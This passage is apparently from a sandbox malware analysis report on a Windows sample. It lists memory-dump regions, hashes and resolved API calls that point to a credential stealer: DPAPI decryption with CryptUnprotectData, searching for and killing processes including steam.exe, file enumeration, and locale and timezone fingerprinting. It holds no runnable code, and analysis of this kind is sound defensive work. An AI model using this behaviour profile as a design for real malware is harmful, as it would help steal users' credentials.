                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 97027f73e8b11c78671ba9ac7d3827874ec080fdd4af1c4c6e256e0046f02e58
                                • Instruction ID: b58420fee9bd1446d7c7ab2bcfdc62bb3c94405a0941eedf26c8e5f0c6c024f1
                                • Opcode Fuzzy Hash: 97027f73e8b11c78671ba9ac7d3827874ec080fdd4af1c4c6e256e0046f02e58
                                • Instruction Fuzzy Hash: 9E4153307101598BCB22EF26DE95B9F77A8EF20305F00616BF94597362CBBC9C018B99
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 6~{$B[.u$Kw?$g|_;$iy6$$o1~f$tu<$uP\$H6?$gk[
                                • API String ID: 0-4170337394
                                • Opcode ID: cbd3a3bfd977f63efed6321cfaf5316f7a594c4e37e35991f17b0661a167dca7
                                • Instruction ID: 725e3109ca95a502ffcd75ab172385197b6c2dd5eb27b1b9fb687826fbcd1163
                                • Opcode Fuzzy Hash: cbd3a3bfd977f63efed6321cfaf5316f7a594c4e37e35991f17b0661a167dca7
                                • Instruction Fuzzy Hash: BFB207F360C2049FE304AE2DEC8567AFBE9EF94720F164A3DE6C5C3344E63598458696
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004F46B9
                                • Process32First.KERNEL32(00000000,00000128), ref: 004F46C9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 004F46DB
                                • StrCmpCA.SHLWAPI(?,?), ref: 004F46ED
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004F4702
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 004F4711
                                • CloseHandle.KERNEL32(00000000), ref: 004F4718
                                • Process32Next.KERNEL32(00000000,00000128), ref: 004F4726
                                • CloseHandle.KERNEL32(00000000), ref: 004F4731
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 3c9f3e1eed80ca6e7482ad3893beae39e09b6ac5f3a2f3a805069a40b37b8be9
                                • Instruction ID: 449636073a3cd16c4db89f86652ab27c287087595b72de7819ff3f66da7a1182
                                • Opcode Fuzzy Hash: 3c9f3e1eed80ca6e7482ad3893beae39e09b6ac5f3a2f3a805069a40b37b8be9
                                • Instruction Fuzzy Hash: F901C43150111AEBE7206B60DC8CFFB37BCEB85B41F048299FA45D1181EF7CA9408B69
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 004F4628
                                • Process32First.KERNEL32(00000000,00000128), ref: 004F4638
                                • Process32Next.KERNEL32(00000000,00000128), ref: 004F464A
                                • StrCmpCA.SHLWAPI(?,steam.exe), ref: 004F4660
                                • Process32Next.KERNEL32(00000000,00000128), ref: 004F4672
                                • CloseHandle.KERNEL32(00000000), ref: 004F467D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                • String ID: steam.exe
                                • API String ID: 2284531361-2826358650
                                • Opcode ID: 0c3c9bdebe260eda820f10e5a4db7c3a3efab94f4086dd2c7fded443023b8de9
                                • Instruction ID: bb5348e0be9cc7c587d4becc60288e0cccd29ab9bdf76f746240b67de97cd243
                                • Opcode Fuzzy Hash: 0c3c9bdebe260eda820f10e5a4db7c3a3efab94f4086dd2c7fded443023b8de9
                                • Instruction Fuzzy Hash: CE018F716021299BE7209B70AC48FEB77ACEF49350F0482D6FA48D1140EF7C99948AE9
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E4B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E4B7F
                                • lstrlen.KERNEL32(00504CA8), ref: 004E4B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4BA7
                                • lstrcat.KERNEL32(00000000,00504CA8), ref: 004E4BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004E4BFA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID:
                                • API String ID: 2567437900-0
                                • Opcode ID: cca369ec3d67ac9cb102cbc86a59cebc733fb8f7563a8b57ee91cbb2e988d82e
                                • Instruction ID: df4df4e87f3f1c432e2fd4ef4b21c9eadce013c0124184751744057d61d276a2
                                • Opcode Fuzzy Hash: cca369ec3d67ac9cb102cbc86a59cebc733fb8f7563a8b57ee91cbb2e988d82e
                                • Instruction Fuzzy Hash: 923172316211599BCB21EF26EE95B9F77A5EFA0305F00512BF90597361CB78EC018B98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: &o$"%Ad$UGw$[3q}$ble$gB-$h*}{$i+y
                                • API String ID: 0-1807720337
                                • Opcode ID: 66bed94587c3311240443ac8c26165dbf1274a3db325730f8e31a50bca5506fb
                                • Instruction ID: c9249e46436b7e41e8f56d0374de8d223f81197c31552d3d94b62872644946f5
                                • Opcode Fuzzy Hash: 66bed94587c3311240443ac8c26165dbf1274a3db325730f8e31a50bca5506fb
                                • Instruction Fuzzy Hash: FFB2F5F3A0C2049FE3046E2DEC8567ABBE9EF94720F1A493DE6C4C3744E63598458796
                                APIs
                                  • Part of subcall function 004F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004F71FE
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 004F2D9B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 004F2DAD
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 004F2DBA
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 004F2DEC
                                • LocalFree.KERNEL32(00000000), ref: 004F2FCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: 719f760f3b98ca167793c911dab7dc2e37790f3dfaef026d83e43feff7800859
                                • Instruction ID: f5124fcea9b4a87957a9cee4c7a6859cf569302ebe461be9f2ec464d244cbf1d
                                • Opcode Fuzzy Hash: 719f760f3b98ca167793c911dab7dc2e37790f3dfaef026d83e43feff7800859
                                • Instruction Fuzzy Hash: CDB1FD71900219CFC715CF14C948B66B7F1FB44329F29C1AAD6089B3A6D7BA9D82CF94
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: -=u$2Z}$2my$Fmo$Fmo$r:5
                                • API String ID: 0-2489032309
                                • Opcode ID: c10b2218bce4a22b2ed16f48a9da5408ffd63431651fc6ce78460e2e372b9632
                                • Instruction ID: ef052ede2e9605400fc10cb87e24edc6aff54df3f33183951e2ed43b8a21c6fd
                                • Opcode Fuzzy Hash: c10b2218bce4a22b2ed16f48a9da5408ffd63431651fc6ce78460e2e372b9632
                                • Instruction Fuzzy Hash: 20B2E2F260C2049FE304AF29EC8567AFBE9EF94320F16893DE6C4C7744EA3558458697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *{$:yv$=y%$G?_y$\p,8$mM)
                                • API String ID: 0-3631182876
                                • Opcode ID: 167a452013f1dd63c998730721350d7018c3b3ae736e827d7c65588a458874fb
                                • Instruction ID: 81c606e4b4502c2c59b17bddf9841701a0dedf545448769588eb3fda9d66886b
                                • Opcode Fuzzy Hash: 167a452013f1dd63c998730721350d7018c3b3ae736e827d7c65588a458874fb
                                • Instruction Fuzzy Hash: 12B217F3A0C2049FE3086E2DEC8567ABBE5EF94720F16493DE6C5C7744EA3598018697
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 004F2C42
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F2C49
                                • GetTimeZoneInformation.KERNEL32(?), ref: 004F2C58
                                • wsprintfA.USER32 ref: 004F2C83
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID: wwww
                                • API String ID: 3317088062-671953474
                                • Opcode ID: 7c0023930384fbf5fb01249b9b94520b99325faecdb3be47e753f3db2852bac4
                                • Instruction ID: 570ef9583bf8d9b73e00871b47d921d2c7d9c7fb9e1b0686627f713b232211a6
                                • Opcode Fuzzy Hash: 7c0023930384fbf5fb01249b9b94520b99325faecdb3be47e753f3db2852bac4
                                • Instruction Fuzzy Hash: 90012B71A40604EBDB188F58DC49F6EBB6DEB84721F00832AFA15D77C0DB7819008AD5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: aif$z9{z$z}$M[$cRW
                                • API String ID: 0-1756225985
                                • Opcode ID: 9f921f8cc126c0d9842d8a27abf5ee689a6bc8b6b828757f8a839693c9918258
                                • Instruction ID: 43558970e0cbe554e5cdb30c9ac31d072afab7bef62d107fe0958d154c020602
                                • Opcode Fuzzy Hash: 9f921f8cc126c0d9842d8a27abf5ee689a6bc8b6b828757f8a839693c9918258
                                • Instruction Fuzzy Hash: C9B207F3A0C204AFE3046E2DEC8567AB7E9EF94720F1A493DE6C5C3744EA3558058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 5>]_$9Xg>$:}os$pbNl$zg#m
                                • API String ID: 0-4235228168
                                • Opcode ID: f011803f441396f8936521a7ec30c64a1955b2eb077079e829cc1ff31533bb96
                                • Instruction ID: ad699a78f77498cbbe049eb6817a95c1d1f6f688505658e538e9617eba920c81
                                • Opcode Fuzzy Hash: f011803f441396f8936521a7ec30c64a1955b2eb077079e829cc1ff31533bb96
                                • Instruction Fuzzy Hash: DFB207F39082049FE304AE2DDC8577ABBE6EF94720F1A863DEAC4C7744E63558058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 2Oo$HDg$L=y$L=y$k{
                                • API String ID: 0-3867656540
                                • Opcode ID: 09e83ddc02b9ac602abba94af1844f0b4c0e255d624cd604686c7e8dad7e6c74
                                • Instruction ID: 396d412f306db0068234e304920c35f9ff38a1538cbc6806276b810714157c24
                                • Opcode Fuzzy Hash: 09e83ddc02b9ac602abba94af1844f0b4c0e255d624cd604686c7e8dad7e6c74
                                • Instruction Fuzzy Hash: D0B2C5F3A0C210AFE704AE19DC4567AFBE5EF94720F16892DEAC4C3744E63598148B97
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: &e=$1MGQ$Q{$ax+?$gJ*
                                • API String ID: 0-3576996562
                                • Opcode ID: ad08f4da780cafb991b53b92995309286219609b1836b70143dd5958aa7d5f79
                                • Instruction ID: 442eccad3d03257aa0e30e97bfd88ae5d4d96d03d74d2960f2b805630a4b1f98
                                • Opcode Fuzzy Hash: ad08f4da780cafb991b53b92995309286219609b1836b70143dd5958aa7d5f79
                                • Instruction Fuzzy Hash: 8BA2D1F3A0C2149FE304AE29EC8567ABBE5EB94320F1A493DEAC4C7344E63558458797
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 004D775E
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004D7765
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004D778D
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004D77AD
                                • LocalFree.KERNEL32(?), ref: 004D77B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 618f2d34996d8db37f1e6459e013ca640fc53f9db7df5dadabcd7399c14f2400
                                • Instruction ID: bc9b01a00fbc61fa1f4eef89165dd5f102e098a62e3fe08d37180bc7713ebf20
                                • Opcode Fuzzy Hash: 618f2d34996d8db37f1e6459e013ca640fc53f9db7df5dadabcd7399c14f2400
                                • Instruction Fuzzy Hash: 99012575B40309BBEB10DB94DC4AFAA7B78EB44B11F108155FB05EB2C0DAB4A900C794
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: J3g$7;k$Aq{?$BaU$T175
                                • API String ID: 0-982664591
                                • Opcode ID: fb0f063a7b5ec97b1dd156c5086b6c39e83aafc3c5c3aa65cec998fe0f3af7b7
                                • Instruction ID: 7fe083c916f1152ccc3df91b06f76fee51f020b67db8c56bfaebff8bda13bb61
                                • Opcode Fuzzy Hash: fb0f063a7b5ec97b1dd156c5086b6c39e83aafc3c5c3aa65cec998fe0f3af7b7
                                • Instruction Fuzzy Hash: 5192E5F36082049FE304BE2DEC8567ABBE5EF94720F1A493DEAC4C3744E63598158697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Itru$_kt$b#5$p|
                                • API String ID: 0-4270282277
                                • Opcode ID: be93d3d22b01961dc410479d49407e0b627628887611466b7eed74ba4f738e8e
                                • Instruction ID: dad185a7c3076c36c3866b94b8bafa4cfb6a38d3c5ebc7d86758bd8daa491084
                                • Opcode Fuzzy Hash: be93d3d22b01961dc410479d49407e0b627628887611466b7eed74ba4f738e8e
                                • Instruction Fuzzy Hash: 1EB25BF3A0C2009FE7046E2DEC8567ABBEAEFD4720F1A853DE6C5C3744E93558058696
                                Strings
                                Memory Dump Source
